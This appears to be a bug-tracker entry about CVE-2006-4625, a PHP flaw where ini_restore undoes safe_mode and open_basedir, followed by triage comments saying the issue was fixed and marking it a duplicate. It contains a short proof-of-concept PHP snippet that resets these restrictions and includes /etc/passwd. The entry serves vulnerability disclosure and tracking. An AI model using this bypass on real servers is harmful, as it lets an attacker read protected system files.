http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4625 http://secunia.com/advisories/22282/ Exploit: <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include("/etc/passwd"); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include("/etc/passwd"); ?>
this has been overlooked since it was not assigned to security and was restricted, so bug-wranglers could not see it anyways, the issue has been solved a while ago it seems
reassigning now too, sorry for the spam
*** This bug has been marked as a duplicate of 147061 ***